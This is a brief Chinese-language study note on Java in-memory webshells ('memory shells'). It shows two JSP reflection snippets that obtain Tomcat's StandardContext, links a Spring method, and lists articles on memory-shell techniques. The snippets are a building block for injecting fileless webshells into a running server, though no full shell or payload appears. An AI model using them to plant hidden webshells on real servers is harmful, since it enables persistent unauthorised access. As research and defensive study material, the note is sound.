Java内存马如何获得Context

Tomcat获得

  1. <%
  2.     // 一个小路径快速获得StandardContext
  3.     Field reqF = request.getClass().getDeclaredField("request");
  4.     reqF.setAccessible(true);
  5.     Request req = (Request) reqF.get(request);
  6.     StandardContext stdcontext = (StandardContext) req.getContext();
  7. %>

另一种

  1. <%
  2.     final String name = "yang_99";
  3.     ServletContext servletContext = request.getSession().getServletContext();
  5.     Field appctx = servletContext.getClass().getDeclaredField("context");
  6.     appctx.setAccessible(true);
  7.     ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  9.     Field stdctx = applicationContext.getClass().getDeclaredField("context");
  10.     stdctx.setAccessible(true);
  11.     StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  12. %>

spring获得

https://www.anquanke.com/post/id/198886#h3-7

参考

https://github.com/Stakcery/JavaSec/blob/main/5.内存马学习/Tomcat/Tomcat-Servlet型内存马/Tomcat-Servlet型内存马.md

https://www.yuque.com/tianxiadamutou/zcfd4v/tdvszq

https://y4er.com/post/javaagent-tomcat-memshell/

https://xz.aliyun.com/t/9450

https://www.cnblogs.com/rickiyang/p/11368932.html

内存马总结文章

https://githubmemory.com/repo/bitterzzZZ/MemoryShellLearn